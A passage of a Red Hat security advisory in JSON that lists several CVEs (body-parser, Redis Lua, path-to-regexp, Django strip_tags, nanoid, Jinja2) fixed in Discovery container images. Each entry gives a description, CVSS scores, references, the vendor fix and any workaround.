"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
},
{
"cve": "CVE-2024-46981",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2025-01-06T22:00:39.382359+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2336004"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Redis server. This flaw allows an authenticated user to use a specially crafted Lua script to manipulate the garbage collector, potentially leading to remote code execution.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "redis: Redis\u0027 Lua library commands may lead to remote code execution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The problem exists in all versions of Redis with Lua scripting.\n\nThis vulnerability in Redis is classified as high severity rather than moderate due to its potential impact and exploitation scope. By manipulating the Lua garbage collector through crafted scripts, an authenticated attacker can achieve remote code execution (RCE), allowing them to execute arbitrary commands on the host system. This compromises not only the integrity and confidentiality of the data stored in Redis but also the underlying server itself. Furthermore, the exploitation does not require direct access to the server binary, making it feasible for attackers to execute through legitimate, albeit malicious, commands.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-46981"
},
{
"category": "external",
"summary": "RHBZ#2336004",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2336004"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-46981",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46981"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-46981",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46981"
},
{
"category": "external",
"summary": "https://github.com/redis/redis/releases/tag/6.2.17",
"url": "https://github.com/redis/redis/releases/tag/6.2.17"
},
{
"category": "external",
"summary": "https://github.com/redis/redis/releases/tag/7.2.7",
"url": "https://github.com/redis/redis/releases/tag/7.2.7"
},
{
"category": "external",
"summary": "https://github.com/redis/redis/releases/tag/7.4.2",
"url": "https://github.com/redis/redis/releases/tag/7.4.2"
},
{
"category": "external",
"summary": "https://github.com/redis/redis/security/advisories/GHSA-39h2-x6c4-6w4c",
"url": "https://github.com/redis/redis/security/advisories/GHSA-39h2-x6c4-6w4c"
}
],
"release_date": "2025-01-06T21:11:51.687000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "A workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "redis: Redis\u0027 Lua library commands may lead to remote code execution"
},
{
"cve": "CVE-2024-52798",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-12-05T23:00:59.020167+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2330689"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp. A path-to-regexp turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: path-to-regexp Unpatched `path-to-regexp` ReDoS in 0.1.x",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability exists because of an incomplete fix for CVE-2024-45296.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-52798"
},
{
"category": "external",
"summary": "RHBZ#2330689",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2330689"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-52798",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52798"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/f01c26a013b1889f0c217c643964513acf17f6a4",
"url": "https://github.com/pillarjs/path-to-regexp/commit/f01c26a013b1889f0c217c643964513acf17f6a4"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-rhx6-c78j-4q9w",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-rhx6-c78j-4q9w"
}
],
"release_date": "2024-12-05T22:45:42.774000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Avoid using two parameters within a single path segment when the separator is not, for example, /:a-:b. Alternatively, you can define the regex used for both parameters and ensure they do not overlap to allow backtracking.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: path-to-regexp Unpatched `path-to-regexp` ReDoS in 0.1.x"
},
{
"cve": "CVE-2024-53907",
"cwe": {
"id": "CWE-1169",
"name": "CWE-1169"
},
"discovery_date": "2024-11-28T02:48:36.215000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2329288"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in the Django Web Framework. The strip_tags() and stripbtags template filter may be vulnerable to a potential denial of service (DoS) in cases of a large sequence of nested incomplete HTML entities.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "django: Potential denial-of-service in django.utils.html.strip_tags()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as a Moderate severity because it exposes the strip_tags() method and striptags template filter to a potential denial-of-service attack, malicious input containing large sequences of nested incomplete HTML entities could cause excessive processing, but it does not affect data confidentiality or integrity",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-53907"
},
{
"category": "external",
"summary": "RHBZ#2329288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2329288"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-53907",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53907"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-53907",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-53907"
},
{
"category": "external",
"summary": "https://www.djangoproject.com/weblog/2024/dec/04/security-releases/",
"url": "https://www.djangoproject.com/weblog/2024/dec/04/security-releases/"
}
],
"release_date": "2024-12-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "django: Potential denial-of-service in django.utils.html.strip_tags()"
},
{
"cve": "CVE-2024-55565",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2024-12-09T02:00:45.255738+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2331063"
}
],
"notes": [
{
"category": "description",
"text": "nanoid (aka Nano ID) before 5.0.9 mishandles non-integer values. 3.3.8 is also a fixed version.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "nanoid: nanoid mishandles non-integer values",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-55565"
},
{
"category": "external",
"summary": "RHBZ#2331063",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331063"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-55565",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55565"
},
{
"category": "external",
"summary": "https://github.com/ai/nanoid/compare/3.3.7...3.3.8",
"url": "https://github.com/ai/nanoid/compare/3.3.7...3.3.8"
},
{
"category": "external",
"summary": "https://github.com/ai/nanoid/pull/510",
"url": "https://github.com/ai/nanoid/pull/510"
},
{
"category": "external",
"summary": "https://github.com/ai/nanoid/releases/tag/5.0.9",
"url": "https://github.com/ai/nanoid/releases/tag/5.0.9"
}
],
"release_date": "2024-12-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "nanoid: nanoid mishandles non-integer values"
},
{
"cve": "CVE-2024-56201",
"cwe": {
"id": "CWE-150",
"name": "Improper Neutralization of Escape, Meta, or Control Sequences"
},
"discovery_date": "2024-12-23T16:00:38.768252+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2333854"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Jinja2 package. A bug in the Jinja compiler allows an attacker that controls both the content and filename of a template to execute arbitrary Python code, regardless of Jinja\u0027s sandbox being used. An attacker needs to be able to control both the filename and the contents of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications that execute untrusted templates where the template author can also choose the template filename.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jinja2: Jinja has a sandbox breakout through malicious filenames",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability has rated as a IMPORTANT flaw because an attacker controlling both the template content and filename to execute arbitrary Python code, bypassing the sandbox.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-56201"
},
{
"category": "external",
"summary": "RHBZ#2333854",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2333854"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-56201",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56201"
},
{
"category": "external",
"summary": "https://github.com/pallets/jinja/commit/767b23617628419ae3709ccfb02f9602ae9fe51f",
"url": "https://github.com/pallets/jinja/commit/767b23617628419ae3709ccfb02f9602ae9fe51f"
},
{
"category": "external",
"summary": "https://github.com/pallets/jinja/issues/1792",
"url": "https://github.com/pallets/jinja/issues/1792"
},
{
"category": "external",
"summary": "https://github.com/pallets/jinja/releases/tag/3.1.5",
"url": "https://github.com/pallets/jinja/releases/tag/3.1.5"
},
{
"category": "external",
"summary": "https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699",
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699"
}
],
"release_date": "2024-12-23T15:37:36.110000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "To mitigate this vulnerabilty restrict user-controlled template filenames, ensuring they follow a predefined templates.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
